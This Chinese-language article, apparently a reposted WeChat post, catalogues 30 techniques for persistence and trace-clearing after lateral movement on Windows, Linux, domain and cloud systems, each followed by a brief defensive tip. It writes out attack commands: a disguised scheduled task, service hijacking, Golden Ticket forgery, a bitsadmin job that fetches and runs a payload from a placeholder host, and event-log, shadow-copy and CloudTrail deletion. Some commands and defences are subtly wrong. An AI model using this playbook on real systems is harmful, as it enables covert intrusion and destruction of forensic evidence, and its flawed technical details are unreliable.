在攻防对抗中，内网横向移动后的权限维持与痕迹清理是决定攻击能否长期隐蔽的关键环节。本文将系统解析30种高价值技巧，覆盖Windows/Linux系统、域环境及常见服务，并提供对应的防御视角建议。

第一部分：权限维持15则

1. 1. 计划任务伪装
• • 技术点：通过schtasks创建名称类似系统服务（如MicrosoftEdgeUpdate）的定时任务，触发后门执行。
• • 操作：schtasks /create /tn "MicrosoftEdgeUpdate" /tr "C:\malware.exe" /sc hourly
• • 防御：监控计划任务中非微软签名的程序路径。
2. 2. 服务注入
• • 技术点：劫持合法服务（如Print Spooler）的二进制路径指向恶意负载。
• • 操作：sc config spooler binPath= "C:\Windows\System32\mal.dll"
• • 防御：启用服务签名验证（RequireSignedServiceBinaries）。
3. 3. 注册表自启动项
• • 技术点：修改HKCU\Software\Microsoft\Windows\CurrentVersion\Run或HKLM对应项。
• • 隐蔽性：使用CLSID混淆键名（如{AB3D1234-...}）。
• • 防御：部署注册表变更告警规则。
4. 4. 启动文件夹植入
• • 技术点：将恶意快捷方式（.lnk）放入%AppData%\Microsoft\Windows\Start Menu\Programs\Startup。
• • 绕过：利用.url文件伪装为合法文档。
• • 防御：限制用户目录写入权限。
5. 5. WMI事件订阅
• • 技术点：注册WMI事件过滤器（如用户登录触发后门）。
• • 脚本：

  $filterArgs = @{ EventNamespace='root\cimv2'; QueryLanguage='WQL'; Query="SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LogonSession'" }  
  $consumerArgs = @{ Name='MalConsumer'; [ScriptingEngine]='JScript'; ScriptText='...' }  

• • 防御：定期审计__EventFilter/__EventConsumer类。
6. 6. 影子账户创建
• • 技术点：通过注册表添加隐藏账户（F值修改为0x3e9）。
• • 操作：

  reg add "HKLM\SAM\SAM\Domains\Account\Users\000003E9" /v F /t REG_BINARY /d ...  

• • 防御：检查SAM中用户RID是否连续。
7. 7. 黄金票据（Golden Ticket）
• • 技术点：利用域控的KRBTGT哈希伪造TGT票据。
• • 生成：

  kerberos::golden /user:Administrator /domain:contoso.com /sid:S-1-5-21-... /krbtgt:hash /ptt  

• • 防御：定期重置KRBTGT密码（每180天）。
8. 8. ACL后门
• • 技术点：为关键进程（如LSASS.exe）添加调试权限。
• • 操作：

  Set-ProcessSecurityDescriptor-Name lsass -Right GenericAll -Allow  

• • 防御：监控敏感进程的ACL变更。
9. 9. DLL劫持
• • 技术点：替换系统目录（如C:\Windows\System32\）中未签名的DLL。
• • 优先级：利用DLL搜索顺序劫持应用程序。
• • 防御：启用DLL签名强制验证（CIG功能）。
10. 10. RID劫持攻击
• • 技术点：修改低权限用户的RID为500（管理员RID）。
• • 操作：通过mimikatz调整注册表F字段。
• • 防御：检查用户SID与RID的合法性。
11. 11. COM劫持
• • 技术点：注册恶意COM组件劫持MMC或Office调用链。
• • 注册表路径：HKCR\CLSID\{...}\InprocServer32
• • 防御：禁用未签名的COM组件加载。
12. 12. Hook注入（API Hooking）
• • 技术点：注入WS2_32.dll的connect函数实现网络通信重定向。
• • 工具：使用Detours库实现函数劫持。
• • 防御：启用驱动签名验证（DSE）。
13. 13. Bits Jobs持久化
• • 技术点：利用后台智能传输服务（BITS）下载恶意负载。
• • 命令：

  bitsadmin /create backdoor  
  bitsadmin /addfile backdoor http://mal.com/payload.exe C:\temp\svchost.exe  
  bitsadmin /SetNotifyCmdLine backdoor C:\temp\svchost.exe NULL  

• • 防御：审核BITS任务列表。
14. 14. 域信任关系滥用
• • 技术点：在跨域信任场景中利用SID History属性提权。
• • 操作：使用mimikatz添加域控的SID至用户属性。
• • 防御：禁用不必要的域信任关系。
15. 15. Office宏持久化
• • 技术点：在Normal.dotm模板中嵌入恶意宏代码。
• • 触发：用户启动Word时自动执行。
• • 防御：启用宏执行限制（仅允许签名宏）。

第二部分：痕迹清理15则

1. 16. Windows事件日志清除
• • 工具：wevtutil cl Security（需管理员权限）。
• • 对抗：使用内存注入技术直接操作eventlog.service进程。
• • 防御：启用日志转发至SIEM系统。
2. 17. IIS日志擦除
• • 路径：C:\inetpub\logs\LogFiles\W3SVC1\。
• • 技巧：仅删除特定时间段的日志条目（避免全量删除引发怀疑）。
• • 防御：配置日志文件ACL为只读。
3. 18. 防火墙规则恢复
• • 操作：删除新增的放行规则（netsh advfirewall firewall delete rule name="mal_rule"）。
• • 隐蔽：复用已有规则名称（如Remote Desktop）。
• • 防御：基线化防火墙规则并监控变更。
4. 19. 文件时间戳伪造
• • 工具：timestomp.exe -m "01/01/2020 08:00:00" malware.exe。
• • 匹配：将时间戳与系统文件（如notepad.exe）保持一致。
• • 防御：启用文件完整性监控（FIM）。
5. 20. 内存痕迹清除
• • 技术点：卸载恶意驱动后调用ExAllocatePool覆盖内存区域。
• • 工具：使用BOF（Beacon Object Files）实现无文件擦除。
• • 防御：部署内存扫描工具（如Elastic Endpoint）。
6. 21. 回收站绕过删除
• • 命令：del /f /q /s *.*配合shift+delete彻底清除。
• • 增强：使用cipher /w:C:覆写磁盘空闲空间。
• • 防御：审计敏感目录的文件删除操作。
7. 22. 预读取文件清理
• • 路径：C:\Windows\Prefetch\中.pf文件。
• • 操作：定期执行del /f /q C:\Windows\Prefetch\*.pf。
• • 防御：禁用预读取功能（需评估性能影响）。
8. 23. 卷影副本删除
• • 命令：vssadmin delete shadows /all /quiet。
• • 对抗：在提权后优先删除卷影防止取证恢复。
• • 防御：限制vssadmin执行权限。
9. 24. RDP连接记录清除
• • 注册表路径：HKCU\Software\Microsoft\Terminal Server Client\Servers。
• • 自动化：编写脚本批量删除历史IP记录。
• • 防御：启用RDP连接日志审计。
10. 25. 浏览器历史痕迹清理
• • 工具：使用BrowsingHistoryView导出并删除Chrome/Firefox记录。
• • 进阶：劫持浏览器扩展自动清理历史（如恶意插件）。
• • 防御：监控浏览器进程的异常行为。
11. 26. PowerShell日志绕过
• • 技术点：通过-WindowStyle Hidden -ExecutionPolicy Bypass隐藏执行窗口。
• • 日志清除：删除Microsoft-Windows-PowerShell%4Operational.evtx。
• • 防御：启用模块日志记录（ScriptBlockLogging）。
12. 27. WMI日志清理
• • 路径：Applications and Services Logs\Microsoft\Windows\WMI-Activity。
• • 难点：需停止Winmgmt服务后操作日志文件。
• • 防御：启用WMI活动审计策略。
13. 28. Linux utmp/wtmp清理
• • 文件：/var/run/utmp、/var/log/wtmp。
• • 命令：使用utmpdump工具编辑登录记录。
• • 防御：配置ttylog实时记录会话内容。
14. 29. 数据库日志截断
• • MySQL：PURGE BINARY LOGS BEFORE '2024-01-01';
• • MSSQL：执行EXEC sp_cycle_errorlog;循环日志文件。
• • 防御：启用数据库审计并异地存储日志。
15. 30. 云平台日志覆盖
• • AWS：通过DeleteLogGroup删除CloudTrail日志组。
• • Azure：使用Remove-AzLogProfile清除活动日志配置。
• • 防御：启用云日志不可变性（Immutable Storage）。

防御方建议

• • 权限维持检测：部署EDR监控进程树异常、注册表关键路径变更及服务签名异常。
• • 痕迹清理对抗：实施日志多副本存储（本地+云端+物理设备），使用AI分析日志完整性。
• • 红队验证：定期模拟攻击验证防御体系有效性，重点关注上述30项技术的防护盲区。

阅读原文：https://mp.weixin.qq.com/s/KHNbBR3WAjDGaLGvRZoUwQ